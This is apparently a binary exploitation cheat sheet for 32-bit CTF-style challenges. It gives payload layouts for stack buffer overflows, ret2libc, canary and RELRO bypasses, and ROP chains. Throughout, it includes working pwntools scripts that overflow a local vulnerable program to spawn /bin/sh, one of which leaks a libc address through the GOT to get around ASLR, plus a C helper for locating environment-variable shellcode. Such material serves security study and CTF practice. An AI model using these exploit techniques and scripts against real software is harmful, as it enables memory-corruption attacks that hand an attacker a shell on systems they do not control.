# Install libc6-i386 when working on 32-bit challenges from a 64-bit host
sudo apt install libc6-i386

# Simple BOF
# jmp_address - somewhere at the start of the NOPs
NOPS + shellcode + A*(EBP_offset-len(shellcode)) + jmp_address

# When the buffer is too small, put the exploit in an environment variable and try to call it
export SHELLCODE=$(python -c 'print "\x90"*200')$(cat shellcode)

# Find the size of the stack
p/d ($ebp-$esp)/4+4

# Update the size
$(python -c 'print "\x0a\xda\xff\xff"*SIZE')

# DEP/NX Bypass
Ret2LIBC - Buffer + SYSTEM + EXIT + /bin/sh

# DEP + ASLR Bypass
Ret2LIBC - Buffer + SYSTEM + EXIT + /bin/sh > payload
while true; do ./vuln $(cat payload.txt);done

# Canary Bypass
- Set a break point on the stack right after the canary cookie creation
- Find the address of the stack cookie and note it down.
- EX: DWORD PTR [esp+0x1c],eax
- x/wx $esp+0x1c
- Use the RET2LIBC technique to exploit the program, then after the buffer, we will restore the canary cookie.
- Buffer + SYSTEM + EXIT + /bin/sh
- Right before the cookie value is validated we pause the session and update the cookie value
- # Get the stack cookie - canary
gdb-peda$ x/wx $esp+0x1c
0xbffff05c: 0xf6f56000
> set {int}0xbffff05c=0xf6f56000

# CANARY + RELRO Bypass
# Find a function that needs to be called from the GOT and send both addresses one after another
other_function system_address
$(python -c 'print "\x0c\xa0\x04\x08"') $(python -c 'print "\x10\x13\xe5\xb7"')

# ROP Chaining
# call printf function first then run your shell
# for single jump use popret
# for double jump use pop2ret
payload = buffer + printf_addr + pop_ret + arg_addr + system_addr + exit_addr + binsh_addr
NX with ASLR is enabled - RET2PUTS/RET2System
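# RET2SYSTEM payload layout for a 32-bit target (p32 packs 4-byte values):
# padding up to the saved return address, then system() as the new EIP,
# exit() as system()'s return address and the "/bin/sh" pointer as its
# first argument.
#
# Bytes literals keep the concatenation valid under Python 3, where p32()
# returns bytes and "" + bytes raises TypeError; under Python 2 a bytes
# literal is an ordinary str, so nothing changes there.
#
# `system`, `exit` and `binsh` are addresses resolved elsewhere for the
# target's libc build -- they are not defined in this snippet.
payload = b""
payload += b"A" * 140  # junk buffer: padding up to the saved return address
payload += p32(system)  # EIP overwrite
payload += p32(exit)  # return address for system()
payload += p32(binsh)  # argument to system()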
ROP Exploit
# ROP chain for a 32-bit target: printf() is called first, with the gadget
# slot after it (the page's "popret" for a single jump) so the chain carries
# on, and then the classic system()/exit()/"/bin/sh" ret2libc sequence follows.
# NOTE: every address below is specific to the binary and libc build the page
# was written against; it has to be re-derived for any other build.
from pwn import *
buffer = b"A" * 140  # junk padding up to the saved return address
printf_addr = p32(0xb7e31520)  # first call in the chain
pop_ret = p32(0x80482c9)  # pop; ret gadget -- the single-jump "popret" slot
print1_addr = p32(0x8048510)  # printf's argument (the "arg_addr" slot of the chain layout)
system_addr = p32(0xb7e1d3d0)
exit_addr = p32(0xb7e105a0)  # return address for system()
binsh_addr = p32(0xb7f5e1db)  # argument to system()
#payload = buffer + system_addr + exit_addr + binsh_addr  # plain ret2libc variant, kept for reference
payload = buffer + printf_addr + pop_ret + print1_addr + system_addr + exit_addr + binsh_addr
# Launch the vulnerable program and feed it the payload
p = process('./v1')
p.sendline(payload)
p.interactive()
NX + ASLR Bypass - RET2SYSTEM
- Works when the write() and read() functions are accessible.
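from pwn import *

# RET2SYSTEM with NX + ASLR: the first payload makes the program call
# write(1, &GOT[read], 4) so the runtime address of read() is sent back to us;
# system(), exit() and "/bin/sh" are then located at fixed offsets from it and
# a second, plain ret2libc payload is sent.
#
# All literals are bytes (b"...") so the concatenations below are valid under
# Python 3, where p32()/pack() return bytes and "A"*140 + bytes raises
# TypeError; under Python 2 a bytes literal is an ordinary str.
#
# Every address and offset below is specific to the binary and libc build the
# page was written against and has to be re-derived for any other build.

# objdump -d rop | grep ">:" --> take write address
write = p32(0x08048380)
# Get the address of functions in the GOT
# take the read address from here as we need the dynamic value from GOT section
read = p32(0x0804a00c)
# instead of vuln func address - anything can be here as we are just looking to exec it to gain leak address
some_func_addr = p32(0x080484c6)
# write(1, address_read_GOT, 4)
leak = b"A" * 140 + write + some_func_addr + b"\x01\x00\x00\x00" + read + b"\x04\x00\x00\x00"
exploit = process("./vuln", shell=True)
exploit.sendline(leak)
# The 4 bytes write() emits are the runtime address of read()
read_addr = unpack(exploit.recv(4))
print("[+] Read Address is at :", hex(read_addr))
# Offsets from read() inside the target's libc build
system_addr = read_addr - 0xa8810
binsh_addr = read_addr - 0xfff69d45
exit_addr = read_addr - 0xb55c0
print("[+] System Address is at :", hex(system_addr))
print("[+] binsh Address is at :", hex(binsh_addr))
print("[+] Exit Address is at :", hex(exit_addr))
# Second stage: plain ret2libc chain now that the libc addresses are known
shell = b"A" * 140 + pack(system_addr) + pack(exit_addr) + pack(binsh_addr)
exploit.sendline(shell)
exploit.interactive()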
GET ENV Address
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
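/*
 * Print the address at which the environment variable argv[1] will appear
 * inside the process argv[2], based on where it sits in this process's own
 * environment.  The pointer is shifted by twice the difference in
 * program-name length between this helper and the target, as in the
 * original listing.
 *
 * Usage: <this program> <environment variable> <target program name>
 * Exit status: 0 on success, 1 on a usage error or when the variable is not
 * set in the current environment.
 */
int main(int argc, char *argv[]) {
    char *ptr;
    long adjust;

    if (argc < 3) {
        fprintf(stderr, "Usage: %s <environment variable> <target program name>\n", argv[0]);
        return 1;
    }

    ptr = getenv(argv[1]); /* get env var location */
    if (ptr == NULL) {
        /* Without this check the arithmetic below is applied to a NULL
         * pointer and a meaningless address is printed. */
        fprintf(stderr, "%s is not set in the environment\n", argv[1]);
        return 1;
    }

    /* strlen() returns size_t, so take the signed difference first: a target
     * name longer than ours must move the pointer backwards, not wrap an
     * unsigned subtraction around. */
    adjust = ((long)strlen(argv[0]) - (long)strlen(argv[2])) * 2; /* adjust for program name */
    ptr += adjust;

    printf("%s will be at %p\n", argv[1], ptr);
    return 0;
}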